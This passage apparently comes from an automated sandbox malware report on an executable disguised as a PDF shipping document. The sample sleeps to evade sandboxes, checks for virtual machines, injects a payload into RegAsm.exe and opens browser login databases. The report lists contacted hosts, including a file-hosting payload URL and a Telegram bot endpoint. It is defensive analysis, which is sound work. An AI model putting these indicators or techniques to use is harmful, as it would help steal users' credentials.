                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -595592s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -595455s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -595328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 99765Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 99541Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 99437Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 99328Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 99183Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 99078Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 98969Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 98859Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 98750Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 98626Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 98500Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 98390Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 98281Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 98171Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 98060Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 97948Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 97813Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 97703Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 97593Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 97470Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 598063Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597953Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597843Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597734Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597621Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597516Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597406Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597297Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597187Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597078Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596969Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596844Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596734Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596625Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596516Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596406Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596297Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596188Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596063Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 595938Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 595813Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 595702Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 595592Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 595455Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 595328Jump to behavior
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.000000000242D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.000000000242D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                      Source: RegAsm.exe, 00000004.00000002.3290867277.0000000000731000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2557210225.0000000000573000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 298008Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeQueries volume information: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3290043336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2573429947.000000000349F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2573429947.0000000003568000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AWB_3570456515#U00b7PDF.scr.exe PID: 7260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7832, type: MEMORYSTR
                      Source: Yara matchFile source: 00000004.00000002.3291814644.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7832, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 00000004.00000002.3291814644.00000000026EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7832, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3290043336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2573429947.000000000349F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2573429947.0000000003568000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AWB_3570456515#U00b7PDF.scr.exe PID: 7260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7832, type: MEMORYSTR
                      Source: Yara matchFile source: 00000004.00000002.3291814644.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7832, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      211
                      Process Injection
                      1
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      Query Registry
                      Remote Services1
                      Email Collection
                      11
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading
                      1
                      Scheduled Task/Job
                      31
                      Virtualization/Sandbox Evasion
                      LSASS Memory11
                      Security Software Discovery
                      Remote Desktop Protocol11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading
                      211
                      Process Injection
                      Security Account Manager1
                      Process Discovery
                      SMB/Windows Admin Shares1
                      Data from Local System
                      2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Deobfuscate/Decode Files or Information
                      NTDS31
                      Virtualization/Sandbox Evasion
                      Distributed Component Object ModelInput Capture13
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                      Obfuscated Files or Information
                      LSA Secrets1
                      Application Window Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                      Software Packing
                      Cached Domain Credentials1
                      System Network Configuration Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSync13
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      AWB_3570456515#U00b7PDF.scr.exe39%ReversingLabsWin32.Trojan.CrypterX
                      AWB_3570456515#U00b7PDF.scr.exe47%VirustotalBrowse
                      AWB_3570456515#U00b7PDF.scr.exe100%AviraHEUR/AGEN.1308709
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://1009.filemail.com/api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0w0%Avira URL Cloudsafe
                      http://1009.filemail.com0%Avira URL Cloudsafe
                      https://1009.filemail.com0%Avira URL Cloudsafe
                      http://1009.filemail.com/api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wL0%Avira URL Cloudsafe
                      http://1009.filemail.com/api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wLJXv0M&pk_vid=8e2aec8f065dac991740056616c1eb950%Avira URL Cloudsafe
                      https://1009.filemail.com/api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wLJXv0M&pk_vid=8e2aec8f065dac991740056616c1eb950%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ip.1009.filemail.com
                      23.237.188.42
                      truefalse
                        unknown
                        reallyfreegeoip.org
                        104.21.16.1
                        truefalse
                          high
                          checkip.dyndns.com
                          158.101.44.242
                          truefalse
                            high
                            checkip.dyndns.org
                            unknown
                            unknownfalse
                              high
                              1009.filemail.com
                              unknown
                              unknowntrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                https://reallyfreegeoip.org/xml/8.46.123.189false
                                  high
                                  http://1009.filemail.com/api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wLJXv0M&pk_vid=8e2aec8f065dac991740056616c1eb95false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://checkip.dyndns.org/false
                                    high
                                    https://1009.filemail.com/api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wLJXv0M&pk_vid=8e2aec8f065dac991740056616c1eb95false
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://stackoverflow.com/q/14436606/23354AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.000000000242D000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/mgravell/protobuf-netJAWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/botRegAsm.exe, 00000004.00000002.3291814644.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://reallyfreegeoip.orgdRegAsm.exe, 00000004.00000002.3291814644.000000000261E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://1009.filemail.comAWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.00000000023FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://github.com/mgravell/protobuf-netAWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://1009.filemail.comAWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.00000000023D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://1009.filemail.com/api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wAWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.000000000242D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://checkip.dyndns.orgRegAsm.exe, 00000004.00000002.3291814644.00000000025EC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/mgravell/protobuf-netiAWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://reallyfreegeoip.org/xml/8.46.123.189lRegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.comdRegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://stackoverflow.com/q/11564914/23354;AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://stackoverflow.com/q/2152978/23354AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://1009.filemail.com/api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wLAWB_3570456515#U00b7PDF.scr.exefalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://reallyfreegeoip.org/xml/8.46.123.189dRegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://reallyfreegeoip.orgRegAsm.exe, 00000004.00000002.3291814644.000000000261E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://checkip.dyndns.orgdRegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://reallyfreegeoip.orgRegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://checkip.dyndns.comRegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://checkip.dyndns.org/dRegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3291814644.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://reallyfreegeoip.org/xml/RegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3291814644.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.21.16.1
                                                                          reallyfreegeoip.orgUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          23.237.188.42
                                                                          ip.1009.filemail.comUnited States
                                                                          174COGENT-174USfalse
                                                                          158.101.44.242
                                                                          checkip.dyndns.comUnited States
                                                                          31898ORACLE-BMC-31898USfalse
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1620753
                                                                          Start date and time:2025-02-21 08:56:38 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 6m 13s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:5
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:AWB_3570456515#U00b7PDF.scr.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:AWB_3570456515PDF.scr.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/0@3/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 50%
                                                                          HCA Information:
                                                                          • Successful, ratio: 85%
                                                                          • Number of executed functions: 398
                                                                          • Number of non-executed functions: 43
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target RegAsm.exe, PID 7832 because it is empty
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          02:57:29API Interceptor8202x Sleep call for process: AWB_3570456515#U00b7PDF.scr.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          104.21.16.1Order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                          • www.englishmaterials.net/3nop/?-Z=cjlpd&Vz=5VQMUr9vdJst/aGqnmtehORilpahgrSgoeoRp4hSLdasMjOC27ijg2BR7Ep4jmwJ4Zkm
                                                                          Bank Transfer Accounting Copy.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                          • www.fz977.xyz/48bq/
                                                                          PO from tpc Type 34.1 34,2 35 Spec.jsGet hashmaliciousFormBookBrowse
